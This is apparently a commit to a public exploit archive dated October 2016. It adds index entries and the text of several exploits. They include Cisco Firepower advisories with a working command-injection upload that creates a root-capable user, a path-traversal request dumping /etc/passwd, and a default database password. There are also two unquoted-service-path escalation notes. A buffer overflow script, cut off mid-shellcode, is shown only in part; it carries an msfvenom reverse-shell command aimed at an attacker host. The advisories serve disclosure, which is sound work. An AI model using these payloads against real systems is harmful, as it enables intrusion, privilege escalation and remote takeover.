DB: 2016-10-06
10 new exploits Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials Bind 9 DNS Server - Denial of Service ISC BIND 9 - Denial of Service Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution VX Search Enterprise 9.0.26 - Buffer Overflow Sync Breeze Enterprise 8.9.24 - Buffer Overflow Dup Scout Enterprise 9.0.28 - Buffer Overflow Disk Sorter Enterprise 9.0.24 - Buffer Overflow Disk Savvy Enterprise 9.0.32 - Buffer Overflow Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation
This commit is contained in:
parent
77681134f4
commit
5fbed83086
11 changed files with 950 additions and 1 deletions
12
files.csv
12
files.csv
|
@ -3810,6 +3810,7 @@ id,file,description,date,author,platform,type,port
|
|||
4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0
|
||||
4156,platforms/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0
|
||||
4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999
|
||||
40465,platforms/linux/local/40465.txt,"Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials",2016-10-05,KoreLogic,linux,local,0
|
||||
4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0
|
||||
4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - (profile id) SQL Injection",2007-07-07,Xenduer77,php,webapps,0
|
||||
4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0
|
||||
|
@ -32999,7 +33000,7 @@ id,file,description,date,author,platform,type,port
|
|||
36487,platforms/php/webapps/36487.txt,"WordPress Plugin Comment Rating 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0
|
||||
36488,platforms/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0
|
||||
36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0
|
||||
40453,platforms/multiple/dos/40453.py,"Bind 9 DNS Server - Denial of Service",2016-10-04,Infobyte,multiple,dos,53
|
||||
40453,platforms/multiple/dos/40453.py,"ISC BIND 9 - Denial of Service",2016-10-04,Infobyte,multiple,dos,53
|
||||
36490,platforms/php/webapps/36490.py,"WordPress Plugin WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
|
||||
36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
|
||||
36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
|
||||
|
@ -36169,6 +36170,7 @@ id,file,description,date,author,platform,type,port
|
|||
39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||
39870,platforms/php/webapps/39870.html,"Flatpress 1.0.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-05-31,LiquidWorm,php,webapps,80
|
||||
39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
|
||||
40464,platforms/cgi/webapps/40464.txt,"Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion",2016-10-05,KoreLogic,cgi,webapps,0
|
||||
39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple Vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
|
||||
39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash (PoC)",2016-05-31,"David Silveiro",linux,dos,0
|
||||
39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
|
||||
|
@ -36179,6 +36181,7 @@ id,file,description,date,author,platform,type,port
|
|||
39879,platforms/php/webapps/39879.txt,"Joomla! Extension SecurityCheck 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
|
||||
39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",jsp,webapps,0
|
||||
39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
|
||||
40463,platforms/cgi/webapps/40463.txt,"Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution",2016-10-05,KoreLogic,cgi,webapps,0
|
||||
39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
|
||||
39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",php,webapps,80
|
||||
39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
|
||||
|
@ -36572,3 +36575,10 @@ id,file,description,date,author,platform,type,port
|
|||
40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
|
||||
40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
|
||||
40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
|
||||
40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40458,platforms/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
|
||||
40460,platforms/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
|
||||
40461,platforms/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
|
||||
|
|
Can't render this file because it is too large.
|
151
platforms/cgi/webapps/40463.txt
Executable file
151
platforms/cgi/webapps/40463.txt
Executable file
|
@ -0,0 +1,151 @@
|
|||
KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command
|
||||
Execution Leading to Root Access
|
||||
|
||||
Title: Cisco Firepower Threat Management Console Remote Command Execution
|
||||
Leading to Root Access
|
||||
Advisory ID: KL-001-2016-007
|
||||
Publication Date: 2016.10.05
|
||||
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt
|
||||
|
||||
|
||||
1. Vulnerability Details
|
||||
|
||||
Affected Vendor: Cisco
|
||||
Affected Product: Firepower Threat Management Console
|
||||
Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
|
||||
Platform: Embedded Linux
|
||||
CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous
|
||||
Type, CWE-94: Improper Control of Generation of Code
|
||||
Impact: Arbitrary Code Execution
|
||||
Attack vector: HTTP
|
||||
CVE-ID: CVE-2016-6433
|
||||
|
||||
2. Vulnerability Description
|
||||
|
||||
An authenticated user can run arbitrary system commands as
|
||||
the www user which leads to root.
|
||||
|
||||
3. Technical Description
|
||||
|
||||
A valid session and CSRF token is required. The webserver runs as
|
||||
a non-root user which is permitted to sudo commands as root with
|
||||
no password.
|
||||
|
||||
POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1
|
||||
Host: 1.3.3.7
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)
|
||||
Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
DNT: 1
|
||||
Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6
|
||||
Connection: close
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=---------------------------15519792567789791301241925798
|
||||
Content-Length: 813
|
||||
|
||||
-----------------------------15519792567789791301241925798
|
||||
Content-Disposition: form-data; name="manual_update"
|
||||
|
||||
1
|
||||
-----------------------------15519792567789791301241925798
|
||||
Content-Disposition: form-data; name="source"
|
||||
|
||||
file
|
||||
-----------------------------15519792567789791301241925798
|
||||
Content-Disposition: form-data; name="file";
|
||||
filename="Sourcefire_Rule_Update-2016-03-04-001-vrt.sh"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic
|
||||
-----------------------------15519792567789791301241925798
|
||||
Content-Disposition: form-data; name="action_submit"
|
||||
|
||||
Import
|
||||
-----------------------------15519792567789791301241925798
|
||||
Content-Disposition: form-data; name="sf_action_id"
|
||||
|
||||
8c6059ae8dbedc089877b16b7be2ae7f
|
||||
-----------------------------15519792567789791301241925798--
|
||||
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sat, 23 Apr 2016 13:38:01 GMT
|
||||
Server: Apache
|
||||
Vary: Accept-Encoding
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
Content-Length: 49998
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
...
|
||||
|
||||
$ ssh korelogic@1.3.3.7
|
||||
Password:
|
||||
|
||||
Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.
|
||||
Cisco is a registered trademark of Cisco Systems, Inc.
|
||||
All other trademarks are property of their respective owners.
|
||||
|
||||
Cisco Fire Linux OS v6.0.1 (build 37)
|
||||
Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)
|
||||
|
||||
Could not chdir to home directory /Volume/home/korelogic: No such file or
|
||||
directory
|
||||
korelogic@firepower:/$ sudo su -
|
||||
Password:
|
||||
root@firepower:~#
|
||||
|
||||
4. Mitigation and Remediation Recommendation
|
||||
|
||||
The vendor has acknowledged this vulnerability but has
|
||||
not issued a fix. Vendor acknowledgement available at:
|
||||
|
||||
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc
|
||||
|
||||
5. Credit
|
||||
|
||||
This vulnerability was discovered by Matt Bergin (@thatguylevel) of
|
||||
KoreLogic, Inc.
|
||||
|
||||
6. Disclosure Timeline
|
||||
|
||||
2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
|
||||
2016.06.30 - Cisco acknowledges receipt of vulnerability report.
|
||||
2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
|
||||
this vulnerability and for 3 others reported in the
|
||||
same product.
|
||||
2016.08.12 - 30 business days have elapsed since the vulnerability was
|
||||
reported to Cisco.
|
||||
2016.09.02 - 45 business days have elapsed since the vulnerability was
|
||||
reported to Cisco.
|
||||
2016.09.09 - KoreLogic asks for an update on the status of the
|
||||
remediation efforts.
|
||||
2016.09.15 - Cisco confirms remediation is underway and soon to be
|
||||
completed.
|
||||
2016.09.28 - Cisco informs KoreLogic that the acknowledgement details
|
||||
will be released publicly on 2016.10.05.
|
||||
2016.10.05 - Public disclosure.
|
||||
|
||||
7. Proof of Concept
|
||||
|
||||
See Technical Description
|
||||
|
||||
|
||||
The contents of this advisory are copyright(c) 2016
|
||||
KoreLogic, Inc. and are licensed under a Creative Commons
|
||||
Attribution Share-Alike 4.0 (United States) License:
|
||||
http://creativecommons.org/licenses/by-sa/4.0/
|
||||
|
||||
KoreLogic, Inc. is a founder-owned and operated company with a
|
||||
proven track record of providing security services to entities
|
||||
ranging from Fortune 500 to small and mid-sized companies. We
|
||||
are a highly skilled team of senior security consultants doing
|
||||
by-hand security assessments for the most important networks in
|
||||
the U.S. and around the world. We are also developers of various
|
||||
tools and resources aimed at helping the security community.
|
||||
https://www.korelogic.com/about-korelogic.html
|
||||
|
||||
Our public vulnerability disclosure policy is available at:
|
||||
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
|
115
platforms/cgi/webapps/40464.txt
Executable file
115
platforms/cgi/webapps/40464.txt
Executable file
|
@ -0,0 +1,115 @@
|
|||
KL-001-2016-006 : Cisco Firepower Threat Management Console Local File Inclusion
|
||||
|
||||
Title: Cisco Firepower Threat Management Console Local File Inclusion
|
||||
Advisory ID: KL-001-2016-006
|
||||
Publication Date: 2016.10.05
|
||||
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-006.txt
|
||||
|
||||
|
||||
1. Vulnerability Details
|
||||
|
||||
Affected Vendor: Cisco
|
||||
Affected Product: Firepower Threat Management Console
|
||||
Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
|
||||
Platform: Embedded Linux
|
||||
CWE Classification: CWE-73: External Control of File Name or Path
|
||||
Impact: Information Disclosure
|
||||
Attack vector: HTTP
|
||||
CVE-ID: CVE-2016-6435
|
||||
|
||||
2. Vulnerability Description
|
||||
|
||||
An authenticated user can access arbitrary files on the local system.
|
||||
|
||||
3. Technical Description
|
||||
|
||||
Requests that take a file path do not properly filter what files can
|
||||
be requested. The webserver does not run as root, so files such as
|
||||
/etc/shadow are not readable.
|
||||
|
||||
GET /events/reports/view.cgi?download=1&files=../../../etc/passwd%00 HTTP/1.1
|
||||
Host: 1.3.3.7
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)
|
||||
Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
DNT: 1
|
||||
Cookie: CGISESSID=2ee7e6f19a104f4453e201f26fdbd6f3
|
||||
Connection: close
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 22 Apr 2016 23:58:41 GMT
|
||||
Server: Apache
|
||||
Content-Disposition: attachment; filename=passwd
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
Connection: close
|
||||
Content-Type: application/octet-stream
|
||||
Content-Length: 623
|
||||
|
||||
root:x:0:0:Operator:/root:/bin/sh
|
||||
bin:x:1:1:bin:/bin:/sbin/nologin
|
||||
daemon:x:2:2:daemon:/sbin:/sbin/nologin
|
||||
mysql:x:27:27:MySQL:/var/lib/mysql:/sbin/nologin
|
||||
nobody:x:99:99:nobody:/:/sbin/nologin
|
||||
sshd:x:33:33:sshd:/:/sbin/nologin
|
||||
www:x:67:67:HTTP server:/var/www:/sbin/nologin
|
||||
sfrna:x:88:88:SF RNA User:/Volume/home/sfrna:/sbin/nologin
|
||||
snorty:x:90:90:Snorty User:/Volume/home/snorty:/sbin/nologin
|
||||
sfsnort:x:95:95:SF Snort User:/Volume/home/sfsnort:/sbin/nologin
|
||||
sfremediation:x:103:103::/Volume/home/remediations:/sbin/nologin
|
||||
admin:x:100:100::/Volume/home/admin:/bin/sh
|
||||
casuser:x:101:104:CiscoUser:/var/opt/CSCOpx:/bin/bash
|
||||
|
||||
4. Mitigation and Remediation Recommendation
|
||||
|
||||
The vendor has issued a patch for this vulnerability
|
||||
in version 6.1. Vendor acknowledgement available at:
|
||||
|
||||
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2
|
||||
|
||||
5. Credit
|
||||
|
||||
This vulnerability was discovered by Matt Bergin (@thatguylevel)
|
||||
of KoreLogic, Inc.
|
||||
|
||||
6. Disclosure Timeline
|
||||
|
||||
2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
|
||||
2016.06.30 - Cisco acknowledges receipt of vulnerability report.
|
||||
2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
|
||||
this vulnerability and for 3 others reported in the
|
||||
same product.
|
||||
2016.08.12 - 30 business days have elapsed since the vulnerability was
|
||||
reported to Cisco.
|
||||
2016.09.02 - 45 business days have elapsed since the vulnerability was
|
||||
reported to Cisco.
|
||||
2016.09.09 - KoreLogic asks for an update on the status of the
|
||||
remediation efforts.
|
||||
2016.09.15 - Cisco confirms remediation is underway and soon to be
|
||||
completed.
|
||||
2016.09.28 - Cisco informs KoreLogic that the remediation details will
|
||||
be released publicly on 2016.10.05.
|
||||
2016.10.05 - Public disclosure.
|
||||
|
||||
7. Proof of Concept
|
||||
|
||||
See Technical Description
|
||||
|
||||
|
||||
The contents of this advisory are copyright(c) 2016
|
||||
KoreLogic, Inc. and are licensed under a Creative Commons
|
||||
Attribution Share-Alike 4.0 (United States) License:
|
||||
http://creativecommons.org/licenses/by-sa/4.0/
|
||||
|
||||
KoreLogic, Inc. is a founder-owned and operated company with a
|
||||
proven track record of providing security services to entities
|
||||
ranging from Fortune 500 to small and mid-sized companies. We
|
||||
are a highly skilled team of senior security consultants doing
|
||||
by-hand security assessments for the most important networks in
|
||||
the U.S. and around the world. We are also developers of various
|
||||
tools and resources aimed at helping the security community.
|
||||
https://www.korelogic.com/about-korelogic.html
|
||||
|
||||
Our public vulnerability disclosure policy is available at:
|
||||
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
|
115
platforms/linux/local/40465.txt
Executable file
115
platforms/linux/local/40465.txt
Executable file
|
@ -0,0 +1,115 @@
|
|||
KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL
|
||||
Credentials
|
||||
|
||||
Title: Cisco Firepower Threat Management Console Hard-coded MySQL Credentials
|
||||
Advisory ID: KL-001-2016-005
|
||||
Publication Date: 2016.10.05
|
||||
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-005.txt
|
||||
|
||||
|
||||
1. Vulnerability Details
|
||||
|
||||
Affected Vendor: Cisco
|
||||
Affected Product: Firepower Threat Management Console
|
||||
Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
|
||||
Platform: Embedded Linux
|
||||
CWE Classification: CWE-798: Use of Hard-coded Credentials
|
||||
Impact: Authentication Bypass
|
||||
CVE-ID: CVE-2016-6434
|
||||
|
||||
2. Vulnerability Description
|
||||
|
||||
The root account for the local MySQL database has poor password
|
||||
complexity.
|
||||
|
||||
|
||||
3. Technical Description
|
||||
|
||||
root@firepower:/Volume/6.0.1# mysql -u root --password=admin
|
||||
Warning: Using a password on the command line interface can be insecure.
|
||||
Welcome to the MySQL monitor. Commands end with ; or \g.
|
||||
Your MySQL connection id is 23348
|
||||
Server version: 5.6.24-enterprise-commercial-advanced-log MySQL Enterprise
|
||||
Server - Advanced Edition (Commercial)
|
||||
|
||||
Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
|
||||
|
||||
Oracle is a registered trademark of Oracle Corporation and/or its
|
||||
affiliates. Other names may be trademarks of their respective
|
||||
owners.
|
||||
|
||||
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
|
||||
|
||||
mysql> show databases;
|
||||
+--------------------+
|
||||
| Database |
|
||||
+--------------------+
|
||||
| information_schema |
|
||||
| Sourcefire |
|
||||
| external_data |
|
||||
| external_schema |
|
||||
| mysql |
|
||||
| performance_schema |
|
||||
| sfsnort |
|
||||
+--------------------+
|
||||
7 rows in set (0.00 sec)
|
||||
|
||||
mysql>
|
||||
|
||||
Note that mysqld listens only on loopback, so a remote attacker
|
||||
would have to leverage some other condition to be able to reach
|
||||
the mysql daemon.
|
||||
|
||||
4. Mitigation and Remediation Recommendation
|
||||
|
||||
The vendor has acknowledged this vulnerability
|
||||
but has not released a fix for the
|
||||
issue. Vendor acknowledgement available at:
|
||||
|
||||
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc1
|
||||
|
||||
5. Credit
|
||||
|
||||
This vulnerability was discovered by Matt Bergin (@thatguylevel)
|
||||
of KoreLogic, Inc.
|
||||
|
||||
6. Disclosure Timeline
|
||||
|
||||
2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
|
||||
2016.06.30 - Cisco acknowledges receipt of vulnerability report.
|
||||
2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
|
||||
this vulnerability and for 3 others reported in the
|
||||
same product.
|
||||
2016.08.12 - 30 business days have elapsed since the vulnerability was
|
||||
reported to Cisco.
|
||||
2016.09.02 - 45 business days have elapsed since the vulnerability was
|
||||
reported to Cisco.
|
||||
2016.09.09 - KoreLogic asks for an update on the status of the
|
||||
remediation efforts.
|
||||
2016.09.15 - Cisco confirms remediation is underway and soon to be
|
||||
completed.
|
||||
2016.09.28 - Cisco informs KoreLogic that the acknowledgement details
|
||||
will be released publicly on 2016.10.05.
|
||||
2016.10.05 - Public disclosure.
|
||||
|
||||
7. Proof of Concept
|
||||
|
||||
See Technical Description
|
||||
|
||||
|
||||
The contents of this advisory are copyright(c) 2016
|
||||
KoreLogic, Inc. and are licensed under a Creative Commons
|
||||
Attribution Share-Alike 4.0 (United States) License:
|
||||
http://creativecommons.org/licenses/by-sa/4.0/
|
||||
|
||||
KoreLogic, Inc. is a founder-owned and operated company with a
|
||||
proven track record of providing security services to entities
|
||||
ranging from Fortune 500 to small and mid-sized companies. We
|
||||
are a highly skilled team of senior security consultants doing
|
||||
by-hand security assessments for the most important networks in
|
||||
the U.S. and around the world. We are also developers of various
|
||||
tools and resources aimed at helping the security community.
|
||||
https://www.korelogic.com/about-korelogic.html
|
||||
|
||||
Our public vulnerability disclosure policy is available at:
|
||||
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
|
46
platforms/windows/local/40460.txt
Executable file
46
platforms/windows/local/40460.txt
Executable file
|
@ -0,0 +1,46 @@
|
|||
# Exploit Title: Abyss Web Server X1 2.11.1 Multiple Local Privilege Escalation
|
||||
# Date: 05/10/2016
|
||||
# Exploit Author: Tulpa
|
||||
# Contact: tulpa@tulpa-security.com
|
||||
# Author website: www.tulpa-security.com
|
||||
# Author twitter: @tulpa_security
|
||||
# Vendor Homepage: http://aprelium.com/
|
||||
# Application Download: http://aprelium.com/abyssws/download.php
|
||||
# Version: Software Version 2.11.1
|
||||
# Tested on: Windows 7 x86
|
||||
# Shout-out to carbonated and ozzie_offsec
|
||||
|
||||
1. Description:
|
||||
|
||||
Abyss Web Server installs a service called 'AbyssWebServer' with an unquoted service path running with SYSTEM privileges.
|
||||
This could potentially allow an authorized but non-privileged local
|
||||
user to execute arbitrary code with elevated privileges on the system. Abyss Web Server also suffers from weak file and folder permissions which could allow
|
||||
|
||||
an unauthorized user to swop out executable files with their own payload.
|
||||
|
||||
2. Proof
|
||||
|
||||
C:\Program Files>sc qc AbyssWebServer
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: AbyssWebServer
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Abyss Web Server\abyssws.exe --service
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Abyss Web Server
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
3. Exploit:
|
||||
|
||||
A successful attempt would require the local user to be able to insert their
|
||||
code in the system root path undetected by the OS or other security applications
|
||||
where it could potentially be executed during application startup or reboot.
|
||||
If successful, the local user's code would execute with the elevated privileges
|
||||
of the application.
|
||||
|
||||
|
47
platforms/windows/local/40461.txt
Executable file
47
platforms/windows/local/40461.txt
Executable file
|
@ -0,0 +1,47 @@
|
|||
# Exploit Title: Fortitude HTTP 1.0.4.0 Unquoted Service Path Elevation of Privilege
|
||||
# Date: 05/10/2016
|
||||
# Exploit Author: Tulpa
|
||||
# Contact: tulpa@tulpa-security.com
|
||||
# Author website: www.tulpa-security.com
|
||||
# Author twitter: @tulpa_security
|
||||
# Vendor Homepage: http://www.networkdls.com/
|
||||
# Software Link: http://www.networkdls.com/Software/View/Fortitude_HTTP
|
||||
# Version: Software Version 1.0.4.0
|
||||
# Tested on: Windows 7 x86
|
||||
# Shout-out to carbonated and ozzie_offsec
|
||||
|
||||
1. Description:
|
||||
|
||||
Netgear Genie installs a service called 'Fortitude HTTP' with an unquoted service path
|
||||
|
||||
running with SYSTEM privileges.
|
||||
This could potentially allow an authorized but non-privileged local
|
||||
user to execute arbitrary code with elevated privileges on the system.
|
||||
|
||||
2. Proof
|
||||
|
||||
C:\Program Files>sc qc "Fortitude HTTP"
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: Fortitude HTTP
|
||||
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\NetworkDLS\Fortitude HTTP\Bin
|
||||
\FortitudeSvc.exe /RunService
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : NetworkDLS Fortitude HTTP
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
3. Exploit:
|
||||
|
||||
A successful attempt would require the local user to be able to insert their
|
||||
code in the system root path undetected by the OS or other security applications
|
||||
where it could potentially be executed during application startup or reboot.
|
||||
If successful, the local user's code would execute with the elevated privileges
|
||||
of the application.
|
||||
|
||||
|
93
platforms/windows/remote/40455.py
Executable file
93
platforms/windows/remote/40455.py
Executable file
|
@ -0,0 +1,93 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
print "VX Search Enterprise 9.0.26 Buffer Overflow Exploit"
|
||||
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
|
||||
|
||||
#Author website: www.tulpa-security.com
|
||||
#Author twitter: @tulpa_security
|
||||
|
||||
#Exploit will land you NT AUTHORITY\SYSTEM
|
||||
#You do not need to be authenticated, password below is garbage
|
||||
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
|
||||
#Tested on Windows 7 x86 Enterprise SP1
|
||||
|
||||
#Greetings to ozzie_offsec and carbonated
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
connect=s.connect(('192.168.123.132',80))
|
||||
|
||||
#bad chars \x00\x0a\x0d\x26
|
||||
|
||||
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
|
||||
|
||||
#payload size 308
|
||||
|
||||
buf = ""
|
||||
buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
|
||||
buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
|
||||
buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
|
||||
buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
|
||||
buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
|
||||
buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
|
||||
buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
|
||||
buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
|
||||
buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
|
||||
buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
|
||||
buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
|
||||
buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
|
||||
buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
|
||||
buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
|
||||
